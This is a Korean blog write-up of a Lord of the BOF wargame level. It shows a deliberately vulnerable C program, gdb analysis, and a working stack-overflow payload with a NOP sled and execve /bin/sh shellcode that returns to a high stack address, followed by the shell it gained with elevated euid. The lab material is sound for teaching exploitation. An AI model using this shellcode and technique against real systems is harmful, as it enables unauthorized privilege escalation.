2017. 11. 17. 13:18ㆍSystemHacking/LOB(BOF원정대)
troll / aspirin
[troll@localhost troll]$ /bin/bash2
[troll@localhost troll]$ SHELL=/bin/bash2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | /* The Lord of the BOF : The Fellowship of the BOF - vampire - check 0xbfff */ #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { char buffer[40]; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] != '\xbf') { printf("stack is still your friend.\n"); exit(0); } // here is changed! if(argv[1][46] == '\xff') { printf("but it's not forever\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); } | cs |
0x40000000 | 0x40111000 | 0xbfffe000 | 0xbfffffff |
공유 라이브러리 영역 | 스택 메모리 영역 | ||
* 추가적으로 스택메모리는 0x40111000 ~ 0xbfffe000 사이의 공간을 사용한다
[ Stack 구조 ]
buffer 40byte
saved ebp 4byte
saved eip RET
argc
argv[0]
argv[1]
< 풀이 과정 >
[ gdb 분석 ]
[troll@localhost troll]$ cp vampire vampire.cp
[troll@localhost troll]$ gdb -q vampire.cp
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>: push %ebp
0x8048431 <main+1>: mov %ebp,%esp
0x8048433 <main+3>: sub %esp,40
.... ( 생략 ) ....
0x80484cd <main+157>: leave
0x80484ce <main+158>: ret
End of assembler dump.
(gdb) b *0x80484cd
Breakpoint 1 at 0x80484cd
(gdb) run $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf" + "A" * 65536')
Starting program: /home/troll/vampire.cp $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf" +"A" * 65536')
Breakpoint 1, 0x80484cd in main ()
(gdb) x/24x $ebp-40
0xbffefac0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefad0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefae0: 0x41414141 0x41414141 0x41414141 0xbfbfbfbf <-- saved eip
0xbffefaf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefb00: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefb10: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xbffefb20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefb30: 0x41414141 0x41414141 0x41414141 0x41414141
[ payload ]
0xbffeffff 에서부터 NOP코드를 타고 내려가 쉘 코드를 만나서 쉘코드가 실행된다
[troll@localhost troll]$ ./vampire $(python -c 'print "A" * 44 + "\xff\xff\xfe\xbf" + "\x90" * 65536 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒ᙰ
̀
bash$ id
uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)
bash$ my-pass
euid = 509
music world
bash$
'SystemHacking > LOB(BOF원정대)' 카테고리의 다른 글
| [11] skeleton -> golem [ Hooking & LD_PREROAD ] (0) | 2017.11.17 |
|---|---|
| [10] vampire -> skeleton ( Stack Memory 실제구조 & Symbolic Link ) (0) | 2017.11.17 |
| [8] orge -> troll ( argv[0] , Symbolic Link ) (0) | 2017.11.17 |
| [7] darkelf -> orge ( 심볼릭링크 & argv[2] 활용 ) (0) | 2017.11.17 |
| [6] wolfman -> darkelf ( argv[2] 활용 ) (0) | 2017.11.17 |